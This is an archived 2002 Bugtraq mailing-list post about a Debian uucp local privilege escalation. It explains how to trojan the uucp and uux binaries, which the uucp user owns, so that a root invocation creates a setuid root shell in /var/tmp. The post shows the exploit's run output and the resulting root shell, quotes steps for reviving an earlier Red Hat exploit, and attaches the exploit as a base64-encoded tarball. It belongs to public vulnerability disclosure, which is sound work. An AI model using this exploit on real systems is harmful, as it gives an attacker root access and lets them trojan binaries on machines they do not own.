[23930] in bugtraq
Re: uucp --config patch -- not sufficient
daemon@ATHENA.MIT.EDU (Charles 'core' Stevenson)
Tue Jan 22 00:24:33 2002
Message-ID: <3C4AA88D.6402E532@bokeoa.com>
Date: Sun, 20 Jan 2002 04:22:53 -0700
From: "Charles 'core' Stevenson" <core@bokeoa.com>
Reply-To: core@bokeoa.com
MIME-Version: 1.0
To: zen-parse <zen-parse@gmx.net>
Cc: bugtraq@securityfocus.com, Peter Palfrader <weasel@debian.org>
Content-Type: multipart/mixed;
boundary="------------12D7AEAA6F8840A1DF5406F7"
--------------12D7AEAA6F8840A1DF5406F7
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
On debian the uucp and uux binaries are owned by the uucp user.
Additionally /usr/lib/uucp is writeable by the uucp user. This allows
us to have some fun since we don't have that nasty makewhatis, but we
can still get root by trojaning uucp and uux and hoping a root owned
process executes either one. Attached is an exploit based on zen's which
trojans uucp and uux transparently to root or the user by allowing
normal execution and hiding the true argv[0]. If root runs the command
we create a suid shell in /var/tmp.
[core@devastator:~/tmp/debian-uucp]$ ./exp-erm.sh
o Checking if uucp is installed
o Creating exploit files
o Sent the commands : Sleeping 2 seconds.
o Cleaning up /var/tmp
o Trojaning uucp and uux
o Running the uucp shell. You should remove this when you're done.
sh-2.05$ ls -l .sushi
-rwxrwxr-x 1 core core 5078 Jan 20 03:54 .sushi
Root haplessly runs uux or uucp:
root@devastator:~# uucp --help
Taylor UUCP 1.06.1, copyright (C) 1991, 92, 93, 94, 1995 Ian Lance
Taylor
Usage: uucp [options] file1 [file2 ...] dest
-c,--nocopy: Do not copy local files to spool directory
-C,-p,--copy: Copy local files to spool directory (default)
-d,--directories: Create necessary directories (default)
-f,--nodirectories: Do not create directories (fail if they do not
exist)
-g,--grade grade: Set job grade (must be alphabetic)
-m,--mail: Report status of copy by mail
-n,--notify user: Report status of copy by mail to remote user
-R,--recursive: Copy directories recursively
-r,--nouucico: Do not start uucico daemon
-s,--status file: Report completion status to file
-j,--jobid: Report job id
-W,--noexpand: Do not add current directory to remote filenames
-t,--uuto: Emulate uuto
-u,--usage name: Set user name
-x,--debug debug: Set debugging level
-I,--config file: Set configuration file to use
-v,--version: Print version and exit
--help: Print help and exit
Checking back in with the hacker we find a suid shell :)
sh-2.05$ ls -l .sushi
-rwsr-xr-x 1 root root 5078 Jan 20 03:54 .sushi
sh-2.05$ ./.sushi
sh-2.05#
Tested on stable and unstable. This exploit is not specific to any
certain arch.
Best Regards,
Charles 'core' Stevenson
zen-parse wrote:
>
> Problem: uucp patch from RedHat (possibly others) prevents
> original exploit, but not variations.
>
> Severity: Potential for local root on some distributions,
> uucp.uucp on others.
>
> https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=54466
>
> I had seen this report some time ago, and thought: "Good. They've got a
> bug report. That'll get it fixed. They'll check that before they release a
> new version, at least."
>
> They didn't.
>
> The patch does prevent the original exploit from working.
>
> However, a trivial patch to the exploit I posted makes it work again.
> local user -> uucp (via this problem) -> root (on some distributions, via
> /usr/sbin/makewhatis: '${PATH:0:1} (or similar) + redirection characters'
> issue.)
>
> $ cd redhat7.0-uucp-to-root
> $ sed s/--config/--confi/ < exp-erm.sh >tmp-exp-erm.sh
> $ mv tmp-exp-erm.sh exp-erm.sh
> $ ./runme
>
> and wait for /tmp/rootshell to appear.
>
> (Does anyone at RedHat actually read their bugzilla posts? Might it not be
> an idea to make anything flagged as security actually get looked at by
> someone? 2001-10-09 seems along time for that to go unnoticed.)
>
> -- zen-parse
>
> --
> -------------------------------------------------------------------------
> 1) If this message was posted to a public forum by zen-parse@gmx.net, it
> may be redistributed without modification.
> 2) In any other case the contents of this message is confidential and not
> to be distributed in any form without express permission from the author.
> This document may contain Unclassified Controlled Nuclear Information.
--------------12D7AEAA6F8840A1DF5406F7
Content-Type: application/x-gzip;
name="debian-uucp.tar.gz"
Content-Transfer-Encoding: base64
Content-Disposition: inline;
filename="debian-uucp.tar.gz"
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
--------------12D7AEAA6F8840A1DF5406F7--
